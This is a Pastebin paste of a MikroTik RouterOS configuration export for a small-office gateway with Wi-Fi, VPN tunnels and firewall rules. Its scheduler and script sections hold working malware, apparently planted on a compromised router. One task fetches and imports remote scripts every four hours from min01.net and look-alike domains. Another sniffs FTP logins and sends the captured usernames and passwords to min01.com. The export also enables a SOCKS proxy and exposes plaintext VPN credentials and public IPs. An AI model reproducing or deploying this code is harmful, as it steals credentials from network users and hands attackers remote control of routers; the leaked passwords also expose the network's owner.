Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # jul/28/2019 12:24:49 by RouterOS 6.43
- #
- # model = 951Ui-2nD
- /caps-man channel
- add band=2ghz-b/g/n control-channel-width=20mhz frequency=2457 name=channel1 \
- tx-power=20
- add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
- frequency=2412 name=channel2 tx-power=20
- add band=2ghz-b/g/n control-channel-width=20mhz extension-channel=disabled \
- frequency=2432 name=channel3 tx-power=20
- /interface bridge
- add arp=proxy-arp name=bridge1
- /interface ethernet
- set [ find default-name=ether1 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Wan
- set [ find default-name=ether2 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full comment=Local
- set [ find default-name=ether3 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- set [ find default-name=ether4 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- set [ find default-name=ether5 ] advertise=\
- 10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
- /interface l2tp-client
- add allow=mschap2 connect-to=213.234.25.174 disabled=no name=\
- l2tp-out1_VLG_Merkuri password=258456 user=Moscow
- add allow=mschap2 connect-to=85.172.120.102 disabled=no name=\
- l2tp-out_VLG_Ring password=258456 user=Moscow2
- /interface wireless
- # managed by CAPsMAN
- # channel: 2457/20-eC/gn(20dBm), SSID: London, CAPsMAN forwarding
- set [ find default-name=wlan1 ] ssid=MikroTik
- /caps-man datapath
- add bridge=bridge1 name=datapath1
- /caps-man security
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security1 passphrase=************
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security2 passphrase=**********
- add authentication-types=wpa-psk,wpa2-psk encryption=aes-ccm,tkip \
- group-encryption=aes-ccm name=security3 passphrase=************
- /caps-man configuration
- add channel=channel1 datapath=datapath1 mode=ap name=cfg1 rx-chains=0,1,2 \
- security=security1 ssid=London tx-chains=0,1,2
- add channel=channel3 datapath=datapath1 mode=ap name=cfg2 rx-chains=0,1,2 \
- security=security2 ssid=AV tx-chains=0,1,2
- add channel=channel2 datapath=datapath1 mode=ap name=cfg3 rx-chains=0,1,2 \
- security=security3 ssid=VIP tx-chains=0,1,2
- /interface list
- add exclude=dynamic name=discover
- /interface wireless security-profiles
- set [ find default=yes ] supplicant-identity=MikroTik
- /ip hotspot profile
- set [ find default=yes ] html-directory=flash/hotspot
- /ip ipsec peer profile
- add dh-group=modp1536 name=profile_1
- add dh-group=modp1536 name=profile_2
- add dh-group=modp1536,modp1024 name=profile_3
- add dh-group=modp1536 name=profile_4
- /queue simple
- add max-limit=60M/60M name=\
- "\CE\E3\F0\E0\ED\E8\F7\E5\ED\E8\E5 \F1\EA\EE\F0\EE\F1\F2\E8" queue=\
- pcq-upload-default/pcq-download-default target=100.65.224.0/24
- /caps-man manager
- set enabled=yes
- /caps-man provisioning
- add action=create-dynamic-enabled master-configuration=cfg1 name-format=\
- identity slave-configurations=cfg2,cfg3
- /interface bridge port
- add bridge=bridge1 hw=no interface=ether2
- add bridge=bridge1 hw=no interface=ether3
- add bridge=bridge1 hw=no interface=ether5
- add bridge=bridge1 interface=ether4
- /ip neighbor discovery-settings
- set discover-interface-list=discover
- /interface list member
- add interface=ether2 list=discover
- add interface=bridge1 list=discover
- /interface pptp-server server
- set enabled=yes
- /interface wireless cap
- #
- set caps-man-addresses=127.0.0.1 enabled=yes interfaces=wlan1
- /ip address
- add address=100.65.224.31/24 comment=Local interface=bridge1 network=\
- 100.65.224.0
- add address=***.***.****.***/20 interface=ether1 network=***.***.***.*
- /ip cloud
- set ddns-enabled=yes
- /ip dns
- set allow-remote-requests=yes servers=\
- 185.121.177.177,5.189.170.196,8.8.8.8,104.238.186.189
- /ip firewall address-list
- add address=127.0.0.1 disabled=yes list=allow-ip
- add address=100.65.224.33 disabled=yes list=ftpgood
- /ip firewall filter
- add action=accept chain=input dst-port=8291 protocol=tcp
- add action=accept chain=forward dst-port=3389 in-interface=ether1 protocol=\
- tcp
- add action=accept chain=input comment=GRE protocol=gre
- add action=accept chain=input comment=PPTP dst-port=1723 protocol=tcp
- add action=accept chain=forward dst-port=445 protocol=tcp
- add action=drop chain=input comment=DNS dst-port=53 protocol=udp
- add action=accept chain=input comment=Estebleshet/Relate connection-state=\
- established,related
- add action=accept chain=forward connection-state=established,related
- add action=drop chain=input comment=Invallid connection-state=invalid \
- in-interface=ether1
- add action=drop chain=forward connection-state=invalid
- add action=accept chain=input comment=SSTP dst-port=443 in-interface=ether1 \
- protocol=tcp
- add action=accept chain=input comment=IPSEC dst-port=500,4500 in-interface=\
- ether1 protocol=udp
- add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
- add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
- add action=tarpit chain=input comment=\
- "Add you ip addess to allow-ip in Address Lists." disabled=yes dst-port=\
- 30553 protocol=tcp
- /ip firewall mangle
- add action=add-dst-to-address-list address-list=atls address-list-timeout=\
- none-dynamic chain=prerouting comment=tls disabled=yes dst-port=21 \
- layer7-protocol=*3 protocol=tcp
- add action=add-dst-to-address-list address-list=ftpinit address-list-timeout=\
- none-dynamic chain=prerouting comment=ftp disabled=yes dst-address-list=\
- !ftpok dst-port=21 protocol=tcp
- /ip firewall nat
- add action=accept chain=srcnat comment="IPSec Volgograd ****" disabled=yes \
- dst-address=172.16.3.0/24 src-address=100.65.224.0/24
- add action=dst-nat chain=dstnat disabled=yes dst-port=3389 log=yes protocol=\
- tcp to-addresses=100.65.224.42 to-ports=3389
- add action=accept chain=srcnat comment="IPSec Volgograd ****" dst-address=\
- 10.8.0.0/24 src-address=100.65.224.0/24
- add action=accept chain=srcnat comment="IPSec ****" dst-address=\
- 192.168.1.0/24 src-address=100.65.224.0/24
- add action=masquerade chain=srcnat comment=Masquerade out-interface=ether1
- /ip ipsec peer
- add address=***.**.***.***/32 comment="***** IPSEC" exchange-mode=main-l2tp \
- generate-policy=port-override passive=yes profile=profile_1 secret=\
- *******
- add address=***.***.**.***/32 comment=VOLGOGRAD_IPSEC exchange-mode=main-l2tp \
- generate-policy=port-override passive=yes profile=profile_2 secret=\
- ********
- add address=**.**.**.**/32 comment=Ring exchange-mode=main-l2tp \
- generate-policy=port-override profile=profile_2 secret=*********
- /ip ipsec policy
- add dst-address=10.8.0.0/24 sa-dst-address=213.234.25.92 sa-src-address=\
- 178.236.241.126 src-address=100.65.224.0/24 tunnel=yes
- add disabled=yes dst-address=172.16.3.0/24 sa-dst-address=85.172.120.102 \
- sa-src-address=**.**.***.*** src-address=100.65.224.0/24 tunnel=yes
- /ip proxy
- set enabled=yes port=63141
- /ip proxy access
- add action=deny comment=sysadminpxy
- /ip route
- add distance=1 gateway=ether1
- add distance=1 dst-address=172.16.3.0/24 gateway=172.16.40.1 pref-src=\
- 100.65.224.31
- add distance=1 dst-address=172.17.2.0/24 gateway=172.16.30.1 pref-src=\
- 100.65.224.31
- /ip service
- set telnet disabled=yes
- set ftp disabled=yes
- set www disabled=yes
- set ssh disabled=yes
- set api disabled=yes
- set winbox address=\
- 213.234.25.92/32,85.172.120.102/32,100.65.224.0/24,93.94.221.180/32
- set api-ssl disabled=yes
- /ip socks
- set port=27182
- /ppp secret
- add local-address=100.65.224.31 name=****************** password=\
- ***************** remote-address=100.65.224.36 service=pptp
- add local-address=100.65.224.31 name=Disp password=*** remote-address=\
- 100.65.224.35 service=pptp
- add local-address=100.65.224.31 name=Disp2 password=**** remote-address=\
- 100.65.224.38
- /system clock
- set time-zone-name=Europe/Moscow
- /system identity
- set name="MikroTIik Gateway"
- /system ntp client
- set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
- /system routerboard settings
- set silent-boot=no
- /system scheduler
- add interval=1d name=Auto113 on-event=\
- "/system scheduler remove [find name=upd111]\r\
- \n/system reboot" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
- sep/16/2018 start-time=03:11:00
- add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
- \n:do {/file remove u113.rsc} on-error={}" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
- startup
- add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
- 31416/min01\?key=FK7Yzw9S2pFAVP&port={vport}\" mode=http dst-path=u113.rsc\
- } on-error={}\r\
- \n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=FK7Yzw9S2pFA\
- VP&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
- \n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=FK7Yzw9S2pFAVP&\
- port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\
- \n:do {/import u113.rsc} on-error={}\r\
- \n:do {/file remove u113.rsc} on-error={}" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
- oct/31/2018 start-time=04:58:07
- add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
- t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
- d script =\"scftp\"];:execute \"scftp\"};" policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
- startup
- /system script
- add dont-require-permissions=no name=scftp owner=admin policy=\
- ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
- ool sniffer stop} on-error={}\r\
- \nwhile (true) do={\r\
- \nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
- good] do={\r\
- \n:local ipftp [/ip firewall address-list get \$i address] \r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
- dress=\$ipftp]} on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
- ess=\$ipftp]} on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
- ss=\$ipftp]} on-error={}\r\
- \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
- \n}\r\
- \nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
- \n:local ipftp [/ip firewall address-list get \$i address]\r\
- \n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
- lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
- led=no memory-scroll=no} on-error={}\r\
- \n:do {/tool sniffer start} on-error={}\r\
- \n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
- } on-error={}\r\
- \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
- dress=\$ipftp]} on-error={}\r\
- \n:local len0 0\r\
- \n:local len1 0\r\
- \n:local file0 \"\"\r\
- \n:local file1 \"\"\r\
- \n:local minute\r\
- \n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
- \nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
- \n:do {\r\
- \n:set \$len0 \$len1\r\
- \n:set \$file0 \$file1 \r\
- \n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
- \n:set \$len1 [:len \$file1]\r\
- \n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
- get time] 3 5]]=\$minute)))\r\
- \n:do {/tool sniffer stop} on-error={}\r\
- \n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
- \n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
- \n:local user \"\"\r\
- \n:local pass \"\"\r\
- \nif (\$pUSER>0) do={\r\
- \n:set \$pUSER (\$pUSER+5)\r\
- \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
- \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pUSER<\$len0) do={\r\
- \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
- \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
- \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
- \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
- \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
- \n:set \$user (\$user.\$ch)\r\
- \n:set \$pUSER (\$pUSER+1)\r\
- \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
- \n}}\r\
- \nif (\$pPASS>0) do={\r\
- \n:set \$pPASS (\$pPASS+5)\r\
- \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
- \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pPASS<\$len0) do={\r\
- \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
- \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
- \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
- \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
- \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
- \n:set \$pass (\$pass.\$ch)\r\
- \n:set \$pPASS (\$pPASS+1)\r\
- \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
- \n}}\r\
- \nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
- \nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
- \n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
- r={}\r\
- \n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
- user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
- \n}}\r\
- \n:delay 1s\r\
- \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
- \n}\r\
- \n:delay 1s\r\
- \n}\r\
- \n"
- /tool sniffer
- set file-limit=200KiB file-name=178.236.242.74.txt filter-interface=all \
- filter-ip-address=178.236.242.74/32 filter-port=ftp memory-scroll=no
Add Comment
Please, Sign In to add comment